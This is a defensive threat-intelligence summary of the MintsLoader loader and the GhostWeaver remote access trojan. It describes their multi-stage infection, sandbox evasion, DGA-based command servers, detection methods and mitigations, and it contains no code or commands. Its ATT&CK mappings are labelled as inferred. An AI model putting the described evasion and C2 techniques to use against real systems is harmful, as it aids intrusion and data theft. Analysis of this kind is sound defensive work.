Full Report
The malware loader known as MintsLoader has been used to deliver a PowerShell-based remote access trojan called GhostWeaver. "MintsLoader operates through a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts," Recorded Future's Insikt Group said in a report shared with The Hacker News. "The malware employs sandbox and virtual machine evasion techniques, a domain
Analysis Summary
# Tool/Technique: MintsLoader
## Overview
MintsLoader is a malware loader that operates through a multi-stage infection chain, utilizing obfuscated JavaScript and PowerShell scripts to deliver secondary payloads, notably the GhostWeaver remote access trojan (RAT). It is often distributed via phishing campaigns and employs evasion techniques to hinder analysis.
## Technical Details
- Type: Malware Loader
- Platform: Windows (implied by reliance on JavaScript and PowerShell)
- Capabilities: Multi-stage infection, sandbox/VM evasion, Domain Generation Algorithm (DGA) for C2 resolution, HTTP-based C2 for subsequent payload delivery.
- First Seen: Early 2023
## MITRE ATT&CK Mapping
(Note: Specific mappings are inferred based on described loader behavior, as the article does not provide explicit mappings.)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1547 - Boot or Logon Autostart Execution
- T1027 - Obfuscated Files or Information
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP C2)
## Functionality
### Core Capabilities
- **Multi-Stage Delivery:** Executes through obfuscated JavaScript and PowerShell scripts in a multi-stage process.
- **Payload Dropper:** Primary function is to download and execute the next-stage payload (e.g., GhostWeaver, StealC, modified BOINC client) from a DGA-generated domain.
- **Evasion:** Employs techniques to evade detection by sandboxes and virtual machines.
- **Social Engineering:** Recently used in conjunction with the **ClickFix** social engineering trick, where victims are persuaded to copy and execute malicious code.
### Advanced Features
- **Domain Generation Algorithm (DGA):** Implements a DGA mechanism where the Command and Control (C2) domain is derived based on the current calendar day, complicating C2 tracking.
- **Obfuscation:** Utilizes heavy obfuscation within its scripts to complicate static and dynamic analysis.
## Indicators of Compromise
*Note: Specific file hashes, exact registry keys, and precise network indicators were not provided in the summary text.*
- File Hashes: [Not specified]
- File Names: [Inferred to be JS/PowerShell scripts]
- Registry Keys: [Not specified]
- Network Indicators: C2 domains generated via DGA over HTTP.
- Behavioral Indicators: Execution chains involving JavaScript leading to obfuscated PowerShell; attempts to communicate over HTTP to dynamically determined domains.
## Associated Threat Actors
- Threat actors utilizing e-crime services such as **SocGholish** (aka FakeUpdates) and **LandUpdate808** (aka TAG-124).
## Detection Methods
- [Signature-based detection]: Signatures against known MintsLoader script patterns or secondary payloads.
- [Behavioral detection]: Monitoring for multi-stage execution chains starting with JavaScript/PowerShell leading to suspicious network connections (especially DGA resolution). Monitoring for sandbox/VM evasion attempts.
- [YARA rules if available]: Likely developed based on the obfuscation techniques or script structure.
## Mitigation Strategies
- [Prevention measures]: Employee training on identifying phishing lures and social engineering tactics like **ClickFix**. Email filtering to block known malicious domains/senders.
- [Hardening recommendations]: Restricting PowerShell execution via AppLocker or Windows Defender Application Control (WDAC); enforcing execution policies for scripts.
## Related Tools/Techniques
- **GhostWeaver:** The secondary payload often deployed by MintsLoader.
- **ClickFix:** A social engineering tactic used to trick users into running malicious code.
- **SocGholish/FakeUpdates & LandUpdate808:** Threat groups known to leverage MintsLoader.
- **StealC:** Another known secondary payload delivered by MintsLoader.
---
# Tool/Technique: GhostWeaver
## Overview
GhostWeaver is a PowerShell-based Remote Access Trojan (RAT) known to be deployed as a secondary payload by MintsLoader. Its primary function is to maintain persistent communication with C2 infrastructure, handle further payload delivery, and potentially steal browser data.
## Technical Details
- Type: Remote Access Trojan (RAT) / Payload
- Platform: Windows (PowerShell-based)
- Capabilities: Persistent communication, DGA implementation, plugin system for extensibility, TLS secured C2 with client-side authentication, ability to redeploy MintsLoader.
- First Seen: Mentioned in recent reports (February/May 2025 context).
## MITRE ATT&CK Mapping
(Note: Specific mappings are inferred based on described RAT behavior.)
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/S C2)
- T1543.003 - Windows Service (for persistence, though persistence mechanism isn't fully detailed)
- T1219 - Remote Access Software
- T1105 - Ingress Tool Transfer
## Functionality
### Core Capabilities
- **C2 Communication:** Maintains persistent communication with its C2 server.
- **DGA Functionality:** Generates DGA domains based on a fixed-seed algorithm tied to the week number and year.
- **Payload Delivery (Plugins):** Can deliver additional payloads in the form of plugins.
### Advanced Features
- **Encrypted C2:** Communications are secured via **TLS encryption**.
- **Client-Side Authentication:** Uses an obfuscated, self-signed X.509 certificate embedded directly within the PowerShell script for client-side authentication to the C2 infrastructure.
- **MintsLoader Redeployment:** Possesses a `sendPlugin` command allowing it to deploy MintsLoader as an additional payload, potentially for redundancy or chain diversification.
- **Data Exfiltration/Manipulation:** Plugins are capable of stealing browser data and manipulating HTML content.
## Indicators of Compromise
*Note: Specific file hashes/names relevant to GhostWeaver payloads are not provided.*
- File Hashes: [Not specified]
- File Names: [PowerShell script structure embedded in memory/disk]
- Registry Keys: [Not specified]
- Network Indicators: C2 servers leveraging TLS secured channels authenticated via embedded, self-signed X.509 certificates.
- Behavioral Indicators: Outbound connections utilizing TLS utilizing non-standard or self-signed certificates; unusual PowerShell behavior related to managing plugins or re-launching loaders.
## Associated Threat Actors
- Shared dependency with threat actors deploying **MintsLoader**.
## Detection Methods
- [Signature-based detection]: Detecting the specific embedded self-signed X.509 certificate used for C2 authentication.
- [Behavioral detection]: Monitoring for PowerShell processes establishing TLS connections seeking to authenticate with unique, embedded certificates. Detection of DGA lookups tied to weekly cycles.
- [YARA rules if available]: Rules targeting the specific PowerShell structure or embedded certificate data.
## Mitigation Strategies
- [Prevention measures]: Strict network egress filtering; deep packet inspection (DPI) of TLS connections to inspect certificates and flag self-signed or unusual C2 traffic.
- [Hardening recommendations]: Application whitelisting to prevent unrestricted PowerShell execution.
## Related Tools/Techniques
- **MintsLoader:** The primary loader for GhostWeaver.
- **DGA:** Used for resilient C2 domain resolution.